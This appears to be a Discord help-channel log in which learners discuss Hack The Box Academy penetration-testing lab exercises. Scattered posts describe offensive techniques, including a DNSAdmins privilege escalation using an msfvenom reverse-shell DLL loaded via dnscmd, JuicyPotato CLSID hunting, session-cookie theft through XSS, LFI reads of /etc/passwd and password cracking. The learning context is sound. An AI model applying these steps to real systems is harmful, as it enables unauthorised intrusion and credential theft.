well

u want to become hacker but u don't want to learn

good pov

Not everyone learns at the same rate.
But honestly, network technology are absolute basics that you should really master. Without these basics it will be damn difficult to understand other things.

If u want to become hacker asap then spend all the time on this

It’s also just totally okay to not fully understand everything at once and just come back to it tomorrow

i understand most of it, but some of it just makes no sense like kerberos and the ticket things. these last 5 sections

cryptography i get actually

I told u what i did

I searched in google how to escape from the shell

or ask chatgpt tbh

but personally i'd just ask for screenshots and be done with it

I just search in google "rbash escape"

and the 2 first webs i checked they showed how to escape

If you google "escaping rbash" the solution is shown in both the first two links displayed

same

well clearly bro dislikes google

but he gets mad because I told him I just searched in google for that exercise lol

"NUUU you kant yoose guguru to sulve problum"

"yuu mush tell meh ansser!"

lol

well yall aint wrong, 2nd top result for me

it's a whole ass article with clearly defined steps and examples.

Anybody have a moment to give a pointer on the last DNS question in the Footprinting module? I’m running out of ideas.

whats the question ask and whatchu tried

Host 203?
You need to find all zones

I haven't notes for that

I’ve been through all the wordlists in my seclists Discovery/DNS folder without much luck hunting for a subdomain with a particular last octet. I’ve found one zone so far. Thanks much guys. That should tide me for now.

but if I remeber well u had to enumerate subdomains of the subdomains

the subdomain has a subdomain

DNSeption

https://academy.hackthebox.com/module/67/section/637 Windows Privilege Escalation -- Skills Assessment I -- Find the password for the ldapadmin account somewhere on the system. -- I got the foothold, and I am root already, I have done all the questions except that one. Any hint?

delete that, u telling the answer

Look for non default software and that might lead you somewhere

What's the difference between a client-server Infrastructure and a one server Infrastructure

they seem like same thing

this skills assessment turned out to be a lot more difficult than i thought it'd be

great way to put everything in module to use

has anyone done the restricted shell portion of linux priv esc? been working on it for a little bit now and I'm stuck. anyone with a hint?

im a bit confused on the web server pivoting with rpivot module I am doing it exactly as the steps in the module suggest i do it but the webserver cannot be reached through my proxychains any tips?

im also unable to interact with the 172.16.5.0/24 network in general through the proxychains with rpivot

nvm i think i fixed it my kali has /etc/proxychains4.conf and i renamed it /etc/proxychains.conf and it seems to now work with rpivot

i am Stuck at privilege escalation : https://academy.hackthebox.com/module/77/section/844
my progress so far : got to user2, got the flag. Generated ssh key, can't put it to /root/.ssh/authorized_keys (access denied), and despite the fact I left password empty, it still asks for password when I try to ssh using it to either user2 or root at a remote. I'm clearly doing something wrong, but can't figure out what
getting it's indigenous /root/.ssh/id_rsa key also results in nothing since it asks for password for a key anyway (which I obviously do not know)

Footprinting Lab - Medium, I got the flag but cheated because I looked up the SQL query for HTB password. Now I'm trying to understand how that SQL query worked. Can someone point me in the right direction to understanding it?

Can I get some help with logrotate section of "Linux privilege escalation" module?
I been trying to get a reverse shell since an hour and have ensured to follow steps correctly.

I'm sutcked at the "using web proxies - burp intruder" section.
I just wanna know if im in the right path here:

any way to find the CLSID to run juicypotato?

have you checked the lists on github that were created for specific operating systems?

I am trying to run all these shits https://ohpe.it/juicy-potato/Test/

Don't know about that but a few moons ago I had used the following:
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

did you find a way to loop through a list of CLSIDs and test them one by one?

Can I ask u how u got it?

all I try I don't get it works

I looked it up but I had learned about that when I was doing a HTB machine, I don't remember what it was but the tool I used was either printspoofer or juicypotato and I had to specify CLSID with -c argument. I had to try a few of them until one worked, I believe I followed a pattern but I don't remember it. Unfortunetly, I don't have notes on that subject.

I think I got it

I just needed to modify a bit the .bat file code

Does this automate the process of looping through CLSIDs, cause I might need that for another project?

yea I did it following this

https://k4sth4.github.io/Juicy-Potato/

Nice

ty for sharing

cheers

it takes a bit to find the clsid

just take the ones with AUTHORITY\system

yea i got it

anyone?

please explain your question more

I am going back over the Server Side Attack module. on the SSTI exploitation Example 2, can anyone help me figure out to get output using the terminal commands? I can get the flag using tplmap but was hoping to do it manully as well. Thanks!

Sure! I'm supposed to "Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag". So i'm using the intruder to send the payload .html on /admin and it's returning 403 forbidden, so i tried to change the user agent and host to see if anything changes and i receive a random 200 ok, but the .html still forbidden

This was addressed in an erratum #858470491676737536 message
The problem was that the payload in the cheatsheet gave an exit status 0 (success), but not the actual output we want

I just need a hint or something, i'm really stucked lol

have you made sure you are requesting with the useragent you are setting up in burp, maybe test via something like curl ?

yep, i think the problem is my request

GET /§admin§/ HTTP/1.1

User-Agent: Apache/2.4.41 (Ubuntu)

Yeah that is what I was getting as well, I take it, it has not been fixed then. Thanks for the info!

You could try the modified payload suggested, it worked for me

I guess it helps to read the post! Thank you very much, that does appear to work!

Hi guys, i'm stuck on the password mutation section of the password attacks module.
I am trying to find the password for the user sam but trying hydra over ftp with the mutated list created from the resources provided will took like 2 hours, there is a way to speed it up or anyone has some hints?

i am also using the flag -t 48 if can help

hey guys, ive been on the pentesting path today. i'm currently in the web enumeration section. when i started the part of running gobuster dns it had gotten super slow. i figured I needed to respawn the target, and i did. but then that takes forever, longer than normal. i closed the VPN logged out , logged back in and when i went to spawn the target, it was showing this weird ip address. I respawned again, and it gave me a different weird ipaddress. anyone know whats up with this??

Is there a reason you're running gobuster against a domain name instead of the actual ip and port they gave you?

nvm I found what module you're in, the weird ip is normal on this one.

The final assessment on that one is so weird and seems unrelated to the module...

I am going through the Introduction to windows command line module, in the skill assessment section I find it very hard to ssh to the remote server, I cheched my internet and VPN connection and everything seems good on my end.

Is anyone having the same sluguich sshing?

Can someone explain the difference. I'm really not getting it. have googl'd and gpt'd but still can't see the difference

Client-server is an umbrella term that refers to any case where many clients ask a server to respond with stuff.
The "one server" depicted on the right is one case of setting up client-server architecture. In that case, you're keeping one or more webapps, a database, etc. all on the one server. This works when the amount of traffic you're handling is small, but when you need to handle more people, that's when you get multiple servers and databases and all of that mess going on.

Ok I see. so the difference is that you don't necessarily keep the web application and database on the same server with the client-server model?

Yes. Client-server is just a general networking concept, the other examples in that module cover different ways of setting up web application infrastructure

ok thanks

basically theyre not mutually exclusive models

Hey, if I'm struggling with one of the academy modules exercises, would this be the place to ask for help?

Is there a common/easy reason for my nmap scans to be missing ports that are open in a box walkthrough?

I think you did it earlier in the module

It’s in the hint in one of the previous sections, but you need to use custom.rule to mutate that that hint

Earlier in the module, not this section

So you start taking notes 😄

I do need help with this one:

been trying for an hour at least lol

I can enumerate all the ports with their services and versions, I tried using netcat to connect with imap and pop3

Good luck with that 😄

trying to use tcpdump to see if something pops up as in the lesson but no luck

Taking notes on everything is very helpful

Are you sure? It should be in the hint of one of the previous sections

nothing pops up, which I think I'm either not using tcpdump correctly, or just missing something 😦

Don’t ctrl+f

Actually go to the hint

https://academy.hackthebox.com/module/19/section/103 😦

Believe me it’s worth taking notes. If you do it now you won’t forget during exam

I used to do the same as you and it annoyed me as well

Anyone have any ideas? I’ve tried several scan types and I can only find them if I specifically target the range of the ports that are being missed

ok I figured out thanks to reddit but honestly, that exercise is misleading in many ways

I'm doing it right now, and while I've answered the first hunt, I'm stuck on the second hunt

I did, but am stuck on the second question for the skills assessment, did you have any luck?

can you help me

Attacking Common Applications - WordPress - Discovery & Enumeration
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).

Used curl, checked the source , but i cant find the correct answer. I know it is noted in the source but I'm looking for something wrong, anyone can give me a help?

interact with the blog

Sorry, that does not help me any further.

hello , i love the yearly subscription of the academy haha .

it's great .

Found it in the blog section. Thanks!

The whole point is password cracking. Taking notes on pwned users is super helpful, as it's good practice in live engagements as well

It can be done without an email client

can anyone help footprinting lab hard, I cannot ssh into the machine

||im getting the error Connection closed by 10.129.11.163 port 22||

Can anyone help me Intentions machine

#1124760302240677958

can no longer access machines through browser using windows+subsystem?

this is using the UDP vpn, using tcp completely breaks it for both subsystem + windows

can you paste the command in sploiler tags? Otherwise dm me, it's up to you

changed it soory

That's not quite what they meant

Your error message seems to indicate that the system you're trying to ssh into may be down

Try resetting target and trying again

Hi, I'm stuck on the question from "vulnerability assessment" in HTB academy: "What is the name of one of the accessible SMB shares from the authenticated Windows scan?" I've accessed the Nessus and authenticated Windows scan provided on the HTBs VM, but have no idea where to look for it and how to find it... Been trying since yesterday. How do I find the accessible SMB shares?

Search smb in the thing that may help narrow it

Iirc nessus shows a lot

Can someone help me in encrypting the .cap file which is converted to .txt using john the ripper

Sorry thats decrypting

It helps if you give us the module name

And section

I suppose your server is paid

?

I don't have any module

I am a beginner

This channel is for assistance specifically with the learning modules found at https://academy.hackthebox.com

What do you mean by "thing" the search for vulnerability?

what is lirc nessus

I did search for smb there and it didn't help..

Iirc meaning if I recall correctly, and "thing" meaning search for smb in the search bar. I don't recall having much difficulty with this module so my memory on this is spotty as I found it boring

ok, I'll keep trying..

Also using pwnbox, hit the full screen button its much nicer than doing it from the tiny window

I found a solution for "Escaping Restricted Shells" in "LINUX PRIVILEGE ESCALATION" module.
It rather looks like workaround but it fits into "think out of the box" idea.
PM me if anyone interested.

yes, you're right. didn't know it was possible. I found the share!! 😄

I mean a lot of stuff is intended

The better solution is using your own vm but that dives into personal preference

Hello everyone!
In my attempts to figure this out, i stumbled upon this server 😄
Had anyone experienced issues with copying and pasting text from Windows to VMWare Virtual Machine running HTB Pwnbox?

It works, but weirdly. I guess only one time per boot

Click the clipboard icon/button

SQL Injection Fundamentals - Subverting Query Logic, the target wont spawn

Unless you are referring to the "htb edition" of parrot which is not the same as pwnbox

oh, alright. Yes, i do

Try http://ip:port

Read the zsh configuration shown in the section above to find what command is mapped to 'll'. Submit the command as the answer. Can anyone help me out?

I tried

It didnt work

So I tried with another section, it didnt work

cat .zshrc

None of them seem to work

I tried https:// aswell, it didnt work

¯_(ツ)_/¯

I haven't done that module

:I

f

I tried but how do i find what command is mapped to II

How do you pipe output to another command

Then using a command that will grab and repeat the line that has a specific string

Hi guys there is an error in module 109 section 1035. The good answer is "&" and it accepts only the wrong answer ''new-line"

Numbers mean absolutely nothing

What is the module and section name

Command injection module - identifying filters

/module/109/section/1036

If you truly believe it to be an error: post it in #858470491676737536

Thanks

There is a pinned template to use to submit feedback there

Hi in Pivoting, Tunneling, and Port Forwarding - SOCKS5 Tunneling with Chisel
what version of chisel can I use in my kali and target to complete module ?

The module should have some hints or have told you how to get there @misty flower

If you've located an error in a module, the #858470491676737536 channel is the spot to post it to get it fixed. They do a great job addressing issues.

module: attacking common applications --> WordPress --> Perform user enumeration against http://blog.inlanefreight.local. Aside from admin, what is the other user present?

How to enumerate the users? In the module they only use manual ways, is this the correct way and should i guess/fuzz the other account? Or did i miss something to find usernames (other than the blog, the name there does not work "A WordPress commenter".

check wpscan out, theres a flag to enum users

tried that, no user results.

what is your command looking like?

sudo wpscan --url blog.inlanefreight.local –enumerate u

looks pretty similar to what I did, tho I used ||--enumerate as well as specifying an API key||

Done that too, same results as the user enumeration.

umm weird

I'll rerun it in a minute

Which version of Metasploit is free and can be used only through a CLI? - my answer is "Metasploit Framework" but prompt says its incorrect..

why it's incorrect ??

feel free to dm me with the output you got, maybe that helps in understanding what went wrong.

which section is that?

Think about the way to start MetaSploit

USING THE METASPLOIT FRAMEWORK - INTRODUCTION TO METASPLOIT

thank you!!

Have fun 🙂

ah yeah now I remember the question 😄

A few reboots of the instance did the job. Got the usernames with the same command as stated earlier.

module: attacking common applications --> WordPress --> Using the methods shown in this section, find another system user whose login shell is set to /bin/bash.

I've enumerated with sudo wpscan --url blog.inlanefreight.local –enumerate u (found user:doug) , bruteforced the password. Logged in, enumerated users again (wp-admin + xmlrpc) but no extra accounts, in the adminpanel there are only 2 users know.

or should i comprimize the rhost first and find there the user?

How would i go on to find the count of these records?

How come, they are seen as 1 object but I cant count them

I just used count for each of the tables and added them together, idk if its cheating but meh lol

Sus

hi guys im suck on this skills assesement the last couple days im getting i dont have permission to view this resource. by far the hardest one so far

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 167.172.54.11 Port 32652</address>
</body></html>

anyhunt help would be greatly appreciated its the file upload one.

please help infomation gathering web skills assessment 3rd question I ran this but didn't see server name :curl -I "http://i.imgur.com"
HTTP/1.1 403 Forbidden
Date: Wed, 05 Jul 2023 12:13:08 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset="UTF-8"
Content-Length: 0
Via: HTTP/1.1 forward.http.proxy:3128
Connection: keep-alive

question Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?

the module teaches u how to get the source code

i have the source code and im doing a get request to the dirrectory with the date in front of name

and thanks for the repply

it is a hard skills assessment

by far the hardest i know im at the last step its like im missing admin permisions

Did you successfully upload?

but the source code will give u all the necessary to bypass all

i did

Because this is not the right one

download a .jpg

and check it with xxd

that is the responce that i was expecting to run the shell

but instead says i dont have acces to the uploaded photos but i uploaded loads with the intruder beforehand

If you successfully uploaded with the right extension and magic bytes, you will successfully be able to upload and execute

Probably not the correct ones then

if u got the source, u have alll the info there to be able to exploit the target

Hey there, quick question.. as far as you know is it possible to do modules and stuff on an Android tablet?

i tried on andorid but the vm wouldnt start an instance for me

il have another read maybe im using wrong magic bytes or something im so close like litteraly last step close

.

il try in repeater instead of intruder

why u trying it in the intruder

that is to find the bypasses with brute forcing

all u need is in the source code

it fuzzes the file names in the get method with the command ls to see if any of my uploaded files respond

Try using whatweb, have a look at the cheat sheet for that module

I used intruder as well tbh

attempt 27896534 hope it works

i got a fresh jpg and im getting slightly bigger byte responses now when uploading photo

thanks so much guys

tell you one thing after this struglle i am most certainly not a master of upload exploitation

xxd file.jpg | head

not more dangerous than trolling in a hacking server I guess

@zinc marsh just ping me if they continue.

https://academy.hackthebox.com/module/67/section/603 - I cannot get this command to run with Powershell run as admin or command prompt running as admin either -

I assume the DNSadmin exploit is to get a system shell so I can read the flag?

Is this the channel to ask for help

It seems liek the first part of the section you add your user to the DNS admin group and then toward the end compile the C code to get a reverse shell as system? Did anyone else have issues with this section. I am doing everthing exactly as instructed running the command as admin but some commands are not working.

Still have a medium integrity. SO, I run cmd as admin but I can't run the reg query......

i got some problems on logrogate sction in linux privesc module

i dont get the right log file

Check the Userfolder

how do I add HTB academy role?

like /usr or the htb user?

bc i tried every logfile ind htb-student folder

Go into your settings via the academy platform

k

No, like /home

Then I can ask for help?

Okay I did that part, are there instructions in a discord channel to get the discord role?

Do you have a Silver annual subscription?

I think you can have the HTB Academy User role only if you have a silver year subscription

how can i scan the subdomains with aquatone?

I have a student subscription

No, the student subscription is not the same.
As far as I know, only subscribers to the Annual Silver Subscription have been able to get this role.

am doing that

OKay thanks

I don't know, the tool was released in 2019 the last release is from 2019. maybe the tool doesn't work anymore?

nvm I had to add http:// with the subdomain

the list was with only the subdomains

Anyone know why this doesn't work? Isn't the point to get system? I am a member of the DNSadmins group but I can't read the flag nor can I run the command in my screenshot with CMD running as admin

Is the goal in this section to get a system shell?

reg query is wrong
Proceed exactly as shown in the module.

Okay, all I did was change the ip to the machine ip I was working on. Here is what happens when I run it per the module -

Here is from the module -

No worries I get the concept. Can I propose an update to the module. All I had to do is make a reverse shell as an msfvenom dll and added it with dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll. then restarted the dns service and spawned a system shell. The point being that DNS services runs as system and if you're a member of that group "DNSadmins" you can potentially spawn a system shell. I believe that's what the module is trying to explain?

Maybe I'm misunderstanding you, but that's exactly what the module shows. What exactly do you want to change?
You can post any change request in #858470491676737536

ah never mind, thanks for your help. I digress.

Was it a tablet or Android mobile device though?

Which module?

This question?
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

I'm trying to do the IDOR in Insecure APIs section and the "Update Profile" button isn't clickable. I've had a similar issue in a previous section where I couldn't click on the Documents button... I just had to keep refreshing the IP til I could. Have yall run into something similar here?

this looks like a path issue

the file you've put the hash in is not accessible at the path you've specified

But you have Kira's password

so hashcat is not reading it correctly

Are you using a VM or the PwnBox?

did you escape the hash?

since it contains $, you will need to escape it on the command line

also your rule doesn't look like it's going to work

" in theory but i think both may work depending on your shell

You must first complete Credential Hunting in Linux

using pwnbox

doesn't appear to be escaping properly

When I click the button, there is an alert
But it works without problems.

Is it possible that your browser in which you run the PwnBox blocks something?

I had a similar problem on a previous section in this module, and after a few refreshes, it worked with no other changes on my end. The browser in the VNC doesn't block anything. It doesnt even show theres a link there to me. It's bizarre

I guess I'll just come back to it later

I'm sorry, I can't help you any further.
Maybe you try it with your own VM?

Actually, it doesn't even need a VM, it's a Docker container that you can access directly from your PC. Try it like this.

I'm more so saying this here to say that this issue is existential, should someone search it wondering the same

@west canopy Can you take a look at it?
For me in the PwnBox it has worked now, but obviously there are difficulties.

characters in your hashes are seem to be getting escaped

It is a password attacks module. Means you have to crack the password 😉

save the hashes to a file and try cracking them.

He doesn't have to crack this hash at all. A few sections above he gets the password from Kira

can i someone pm with command injections - skill assesment ?

It is encrypted

Ahhhh

sure

https://academy.hackthebox.com/module/163/section/1544

Attacking Enterprise Networks -- Web Enumeration & Exploitation -- I think I found the IDOR

someone I could ask for sanity check?

sure

You need to use custom.rule on that pass to get a mutated list of that word

hey friends, i am at Active Directory Enumeration & Attacks - Kerberoasting - from Linux, for 1st Question i am trying this, how to solve this, or am i doing something wrong?

Have you checked to make sure that the IP you're passing is actually the IP of the domain controller?

oh ok, its an attack host

but stell dont get it how to use Getuserspns without creds

oh i got it 🥲 😂 that was sneaky

If you use Rubeus on a domain joined computer, you can technically Kerberoast without creds

Because the credentials are stored in your session

A question for the class.

I'm working through the file transfers module, and most of the module is a list of commands. With that kind of learning material, do you power through and look back to it as a reference, or is a better strategy to drill memorization?

you'll only use a handful of those file transfer methods.

it's only occasionally do a couple fail due to restrictions and you'll have to find a workaround.

you don't need to memorize what they are tbh

mostly you'll just be setting up a python web server and sending a get requestr

Thank you for your help. I find myself getting caught up in trying to internalize every detail. 😅

Just take notes of it and refer back to them when you need them, you’ll start memorizing them as you use them more often

or get a tool that records your past commands used

find / -name notes.zip 2>/dev/null

Try this

it tells you ur locatedb is outdated.

run updatedb then use locate command again.

or yeah, use find command instead

oh ur in a box

if it's not ur host vm, usually you don't want to use locate to find files as either the command doesn't exist, or the locatedb is outdated (like u experienced).

You'd want to use the find command as suggested.

hey everyone;

Can anyone help me I am stuck on the HTB Academy module of Reverse Shell & Payloads - The live engagement Host-1. I tried to deploy the shell file through the upload file directory but when I try to execute the file it shows me 404 not found.
dose anyone knows about it?

could use a hand. stuck on active directory enumeration/dcsync section. i have enumerated the user that has the "reversible encryption option". User is 's*nc**n' . I have confirmed that he has those rights with powershell/powerview. How do i go about finding his cleartext password. I can't use secretsdump.py because the jump host is a windows machine. i try to use mimikatz but it gives an error. feels like i'm missing something dumb. thanks.

Try following steps simmilar to this: ||https://vk9-sec.com/apache-tomcat-manager-war-reverse-shell/||

just saw the note in the beginning of the chapter about 'secretsdump.exe'. ill go investigate that. should be good for now

hello guys

"Another possibility is to exclude specific results. For this, the option "-v" is used with grep. In the next example, we exclude all users who have disabled the standard shell with the name "/bin/false" or "/usr/bin/nologin"."

i do not understant this

https://academy.hackthebox.com/module/18/section/80

There are users on Linux for whom the shell has been disabled.

what is mean shell disabled

+why i cannot send photos

They can't log in through a terminal.

read #welcome

ok i am understand this

but i do not know " grep -v" main method ,is grep for select text only?

i'm trying to use getuserspns_windows.exe but it keeps saying that i am providing it too few arguments. here is my command. PS C:\Tools> .\GetUserSPNs_windows.exe -target-domain INLANEFREIGHT.LOCAL -dc-ip 172.16.5.5 -request-user INLANEFREIGHT\syncron -request

AD enum/DCsync section

ok thanks

i'm having a hard timg googling an example of that command

anyone here has finished with Footprining module?

on Oracle TNS i have tried to install odit.py multiple times but still it doesn't work. can you provide me with answer as long as its last question i need to finish module please?

https://academy.hackthebox.com/module/112/section/2117

still nothing :/

Traceback (most recent call last):
File "/home/******/Documents/Tools/odat/odat.py", line 5, in <module>
from libnmap.parser import NmapParser
ModuleNotFoundError: No module named 'libnmap'

You need to run the tool from it's directory

Also follow the instructions given in the section

as you can see i am on its own directory

also tried to use it as " python3 odat.py all etc "

still nothing

Like I said the section gives an installation script

It's possible it wasn't installed properly

i downloaded via script and then from github

Why both?

one on my os and one in VM coz i thought something might be wrong

from Pwnbox doesnt work

can someone pm plz

asking again. thanks. i'm trying to use getuserspns_windows.exe but it keeps saying that i am providing it too few arguments. here is my command. PS C:\Tools> .\GetUserSPNs_windows.exe -target-domain INLANEFREIGHT.LOCAL -dc-ip 172.16.5.5 -request-user INLANEFREIGHT\syncron -request. what am i missing? hard time finding an example online

Hey guys can anyone help me on the thick client application exploit please, I can not work out what I'm doing wrong when trying to download the server

i do not understand what is AWK

you can google the documentation for awk but in this example it's used to display text in a certain format, this being the first and last result of a string

ok thanks

Stuck on XSS - Phishing XSS module.

Is there anyone free I can shoot a DM to?

just post the problem and what you've tried here

https://academy.hackthebox.com/module/163/section/1544 ATTACKING ENTERPRISE NETWORKS -- Web Enumeration & Exploitation -- Steal an admin's session cookie and gain access to the support ticketing queue. Submit the flag value for the "John" user as your answer. -- I have the cookies but I cannot log in with them

how are you using the cookie to login

I just modified it with cookie editor

and also tried from here

can you see if using a curl request works

or ig changing it w burp

nvm got it

I needed to change the name of the cookie also not only the value

I've created the URL as taught through the module. I enter it to test it and I'm getting only half of the payload completed, the other half is written underneath as "');document.getElementbyId('urlform').remove();">

I'm more curious as to what am I doing wrong for the command not to be fully functioning?

You might just need to troubleshoot where quotes are being placed and what characters are actually ending up where

It's been months since I did the XSS module, but I vaguely remember having to mess with a few things?

Haven't even finished the path and don't plan to take the exam right now lol

I just wanted to do all of the Windows stuff on Academy because Windows privesc and certain aspects of AD were becoming a weak point

I have like 5-6 modules to go but if I take the exam after that I’ll get my ass handed to me😂

any one else have trouble with the RDP and SOCKS Tunneling with SocksOverRDP module question? I keep having issues trying to do the command regsvr32.exe SocksOverRDP-Plugin.dll

nvm had to make sure win defender wasnt deleting it

I thought you were doing that module blind😌

lol

I got a payload to read /etc/passwd but I am not able to find the flag :/

What you show in the image is not Java, it's a very basic XSS payload.. aka html with a bit of JS in the "onerror" parameter

The server knows nothing as it's inanimate, but its members maybe do.. anyway, what is with that question?

can anyone help me with lfi module? I can't do this task "Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt"

yea sorry i was using javascript at the beginning

then I moved to xml

anyone?

bruh I finally got it, I was struggling with the easiest one lol

i am in this section in linux fundmental

If I remember correct, you have to try different wordlists. One of them will hit, but I do not remember which.

I discovered the parameter and I did a fuzzing in the Server Files

did this problem happen to anyone else?

I have it sometimes and idk why

so why this questions is hard

difficulty is subjective to ur knowledge

yes i had the same problem yesterday

how u solved it?

i used mu own machine

I am on my own machine lol

ah sorry

because yesterday i have used the machine of htb and i have this problem

now is working for any reason

Response has been slow for me today as well with the web modules

Intruder took ages

hi everyone, i am in the lab easy common services, i found the hash of fiona in the mysql database and i want to know if it's useful for the rdp service. Moreover, i want to know if it's normal that there is an "*" at the beginning of the hash. TY

Well try it out

i tried pth but no result

Have you tried cracking it?

Has anyone completed the newly updated "Linux privilege escalation" module?
I am stuck on 2 sections and I just can't figure it out

not yet, i have seen the "*" at the beginning of the hash, is it normal ?

i think some of the qs expect u to google things and find out. you wont necessarily learn enough in that section to solve the question

So far I have not faced any module like that.. even though there were times when you had to rely on resources not directly talked about on HTB, they were always mentioned in the module.. what module have you met that didn't provide you with the necessary infos to deduce the answer to questions?

This ofc assuming you have reviewed the module description before starting it and looked for the prerequisite modules, which is right at the end of the description and above "relevant paths"

i think some of them teach you the basics about something and then give a question where they expect u to research a lil more to find out the answer

Have you read and understood all the text above the questions?

lemme find an example

like this one https://academy.hackthebox.com/module/18/section/74

Thank you i got it

💪

@analog dock how are u going with the path?

Like 5-6 to go

u gonna do the exam after finishing?

ur will do pro labs and machines

I won’t do machines

Maybe a pro lab

Probably just go through the modules another time and take good notes

Then probably spend some extra time in ad and web parts

I am trying to do the attacking enterprise networks blindly and is being hard

I’m not surprised

If I go for the exam straight after the course I will get destroyed lol

I have done some things with no problem

but I have been stuck 4 times already

I got stuck a lot doing it blind too

yea me too lol

one part I honestly dont know how youd figure out doing blind

So dont feel bad if you have to cave a little

I am doing the monitoring.inlanefreight.local part rn

and I am stuck again lol

oh I thought that part was easy 😂

I tried all

doing brute force as last hope lol

foothold portion of monitoring?

yea

mmkay

keep doing what youre doing then

youll get it eventually

the easy part was the flag in gitlab

yea i got it

I feel like you don't necessarily have to be able to do all of 'attacking enterprise networks' blind, but you should at least be able to get to domain admin.

That's all that really matters, to show that you understand the material.

the one log part I dont see how you could known blind unless you just already knew it was a thing

Hi guys, i'm stuck on the question of the Credential Hunting in Linux, i got a shell with kira and got the passwd.bak file on will's /home/.backups but i can't transfer shadow.bak, i tried to crack firefow passwords of kira using the tool suggested on the module but it gives a python error, maybe because the box is using python 3.8 instead of python 3.9.
Someone has a hint?

if the file can be read it can be transferred

follow the section

That is deducible and requires no googling at all
In order to know what command to execute to run a http server just start type "http" in the terminal and as taught to you by some previous section use TAB to see what autocomplete suggestions you have
From the 2 suggestions, you will immediately understand that the command you have to run is http-server.
In order to run the server on the port the question asks you to you'll have to use the correct argument, which you still don't know
So, again, as taught in the previous sections, just type -h after a command in order to know the different arguments
Doing http-server -h you find out that the correct argument to use is -p or --port followed by your port number
The question specifically tells you: "use the short argument to specify the port number".. so it's clear that you'll have to use -p as the answer
Congrats, you got your answer using only things you've learned in that module alone

Okay, i will try again from start

u found the shadow.bak already

just follow what it says in the section

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ this website explain some methods for full tty if someone wanna save it

for now it is being easy the first machine

Hey i don't understand how can i retrieve the admin hash in the hard lab common services module. I'm stuck in the last question, i'm connected to the database and i have impersonate a user. I found a linked database and i'm stuck here

can someone help me pls

ok smarty pants not everyone is big brain like u

Ive never used http-server

didn't realize that was preinstalled

I usually use a python module

same

I always use python3 -m http.server 80

or php -S 0.0.0.0:80

i was too scared to use this because what if someone finds way to hack you and get access to your entire file system

got it

hello everyone, someone who has made Use metasploit framework module to ask something

I'm stuck with Sessions & Jobs section

I established a meterpreter session in the target but can't escalate privileges with the sudo exploit

I'm receiving this error message once I try to establish a meterpreter

[-] Msf::OptionValidateError The following options failed to validate: SESSION
[*] Exploit completed, but no session was created.```

any hint, help, stone.....!!!! whatever

it only works for the directory and subdirectories youre currently in. If youre concerned create a new folder and transfer the files you want to serve over to that before running.

its also mostly just a lab exercise thing. In the real world youd be staging a more robust server

and you're saying there is no way a hacker can get into other directories from this

I will never say no way

could be a bug in the http module as unlikely as it is

you could end up putting sensitive stuff yourself in there that could mess things up to

ect

Most people arent going to waste time trying to target other people in a lab

and you should be doing things froma VM so even if you do get pwned you just reset the VM no biggie

whats the best vm to download

kali or parrot

which is the .asp shell which uses username and password instead of IP

It ultimately doesnt matter and is mostly preference. That said kali is industry standard and Just Works Tm

I don't get which of the steps I've showed you would you consider complicate enough to call me big brain for doing them.. it's just reading the sections and actually understanding them.. also, I would suggest you to mind your own language.. I am not your friend to be called names, there has be respect as per rules of the server

Okay but as the resident jackass here you could stand to be less of one yourself

Somehow I'm being a jackass when asking for respectful replies, ok.. makes perfect sense

I'm sorry to hear that, how come?

You were the jackass first with your condescending as fuck answer to their question.

also how thin skinned do you gotta be to get offended at 'smarty pants'

Yes, it is indeed a myth.

Having done the module, it's basically a bunch of metaphysical nonsense disguised as some sort of pep talk.

If your argument is basically "if you work hard at something you'll probably eventually be able to do it", then I don't really disagree.

But so many of the examples given are just dubious.

And then there's some really funny phrasing, like "the official definition of a question"

I am glad academy mostly sticks to pentesting, lol.

I think you haven't paid much attention to what happened, because despite you mentioning it, there is no question they've made at any point in our conversation.. in fact it all started with them giving an arguably wrong answer to somebody else, saying that some questions can't be answered with the knowledge of the module alone

I have disputed that and they offered to provide an example in support of the argument.. they provided me said example and I have explained step by step how someone could answer it with the sole help that module provided.. well, until here it's all good, we were just having a normal conversation.. then I just get called names

Tbh I am not offended, it's just that I don't know about you but I would rather not be called that for no reason by some stranger.. hence I asked them to be more respectful

I'd sort of disagree with your given example, since there's no direct connection between http-server and npm.

The linux fundamentals module is honestly not that good. It sort of jumps all over the place,

It's a free module, so I'm not complaining too much about it, but it's sort of hard to sell you on the training if the free modules are poor,

what are you on about? I see the outputs pretty similar

He meant the pkzip and pkzip2

Personally it doesn't matter, just crack it.

oops looks like i need sleep or i need coffee

Nah it's not ur fault

It's literally the same hash

I personally wouldn't care and just try cracking it.

could it be due to how the zip2john works on kali as oppose to parrot (even though the hash is the same)

Could be, maybe version diff or the os being diff changes smthn

yo @thorn urchin have you done the exploit Thick-Client from Attacking Common Applications? i just wrote a quick walkthrough if you want to have a look? it's could be useful for helping other but it's a tier 2 module so of course i can't share it publicly

anyone done the Web Service & API Attacks module? I want to discuss the last skill assignment cause i think i got the flag in the wrong way.

sure shoot me a dm

Have you tried the mutated wordlist or a different wordlist like rockyou

I mean according to the ss you've only done the loveyou mutation list

Also try using john instead of hashcat

actually you can share that one! Just re-lable it as a Fatty walkthrough segment 😉

also the section seem like the box official writeup (almost 1 to 1)

Looks like it's failing bc of the (2)

I mean some people said they faired better by watching ippsec's video on the box

i did and his video this so good for debugging some of the stuff but his video and other writeup are trying to get RCE but the section need you to get an admin account to access ipconfig or something

The error it gives you

Also you should be making the mutated wordlist from the command given in the "password mutations" section

For Submit the contents of the flag.txt file on the Administrator desktop on MS01 in the AD Enumeration & Attacks - Skills Assessment Part I, I have chisel setup on the web shell and attempting to use proxychains to setup evil-winrm, but how do i know which internal host IP to use? i ran a nmap scan which said all ports were up

Again ready what I said

grab the hash from the workstation as you have already generated it and crack it

if anyone is willing to help would be much appreciate, stuck here for hrs now

